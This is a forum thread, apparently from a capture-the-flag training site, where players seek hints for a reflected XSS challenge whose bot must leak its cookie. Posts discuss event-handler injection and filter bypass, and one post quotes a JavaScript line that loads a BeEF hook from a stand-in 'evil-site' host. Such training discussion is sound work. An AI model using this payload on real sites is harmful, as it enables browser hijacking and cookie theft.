Web - Client

Friday 2 November 2018, 13:09  #1
XSS REFLECTED
Boris
  • 11 posts

Hi. I am a bit stuck.
So I have discovered a place where I can use event handlers. I can get an alert box, but only interaction events like onclick are working.

But what would be the way to get the cookie? A hint?

tnx

Saturday 3 November 2018, 13:03  #2
XSS REFLECTED
Th1b4ud
  • 1636 posts

The bot has the same behavior as a human. Have you tested all the events? https://www.w3schools.com/tags/ref_eventattributes.asp :)

Saturday 3 November 2018, 14:20  #3
XSS REFLECTED
Boris
  • 11 posts

Even if I find the event, and if we say the bot is human-like, I cannot use a script tag and still need to send the location to my server. How would I achieve that in the tag?
Do I have to use BeEF?

Saturday 3 November 2018, 14:56  #4
XSS REFLECTED
Th1b4ud
  • 1636 posts

XSS is not only <script>alert(1)</script>. There are multiple ways to exploit XSS. And why do you want to use BeEF? Do you know what BeEF is doing? Are you really sure it could be useful here?

Sunday 4 November 2018, 12:32  #5
XSS REFLECTED
Boris
  • 11 posts

Because the only place I have found is the tag space and several event handlers, so I cannot use the SCRIPT word,
and I need to send the location.

I have found this script over the net:

var s = document.createElement('script'); s.src='http://evil-site/beef/hook/beefmagic.js.php'; document.getElementsByTagName('head')[0].appendChild(s);

BeEF can hook a browser and extract a cookie, but that didn't work for me..

How can I send the cookie another way in the tag space?

Sunday 4 November 2018, 13:14  #6
XSS REFLECTED
Th1b4ud
  • 1636 posts

Stop copy/pasting anything you find on the internet. You must understand what you are doing! There are several resources on the internet about XSS. Just google it.

Sunday 4 November 2018, 13:57  #7
XSS REFLECTED
Boris
  • 11 posts

I have read a lot...
But within the tag it's different. If I had an img tag it would be easy, using src, but this is different, or am I missing something? In what XSS direction should I read?

I can understand what happens in the script above: it's the creation of an object with script allowed, bypassing the XSS filter on the server, and then loading the BeEF JS hook, which can give control over a browser.

Sunday 4 November 2018, 14:26  #8
XSS REFLECTED
Th1b4ud
  • 1636 posts

No, I think you don't read a lot. First link in Google = OWASP guide. It's the first thing you have to read. Why is it not done?
https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OTG-INPVAL-001)

Saturday 24 November 2018, 04:17  #9
XSS REFLECTED
ttuongann
  • 4 posts

Hi Th1b4ud, I detected an "a tag XSS", and I tried "onmouseover" but the bot doesn't request cookies... any hint for me?

Saturday 24 November 2018, 11:34  #10
XSS REFLECTED
Th1b4ud
  • 1636 posts

I think you are on the right way. Always check your source code after submitting your payload. You have to bypass some filters ;)

Tuesday 27 November 2018, 15:28  #11
XSS REFLECTED
ttuongann
  • 4 posts

Thanks Th1, I think I did everything I know. I used to exploit on the "error page" with success. When I reported to admin, however, the bot doesn't request :(

Wednesday 5 December 2018, 17:06  #12
XSS REFLECTED
Boris
  • 11 posts

I have reflected XSS for myself, but how to force an admin to it...?
I have found an HTML event, bypassed the " filter,
but there is one more filter if I want to use the XSS for the admin....
I need a (hero) hint pls

tnx

Thursday 18 July 2019, 13:58  #13
XSS REFLECTED
randy
  • 4 posts

I don't know if there's something wrong with the bot or not, but I've tried the same events multiple times (onfocus, mouseover, etc.) to no avail. I eventually ended up getting it, but I think part of the reason is the JS functions I was using. It seems like whatever browser they use is extremely out of date (considering that the XSS auditor has been introduced and deprecated recently, which would have prevented my attack), so I'd also recommend sticking to the traditional JavaScript syntax dating back to as early as possible. Also, onfocus didn't work for me (even with the forced focus) but the same request with a different event did (so try not to waste time on that even though you know it's correct).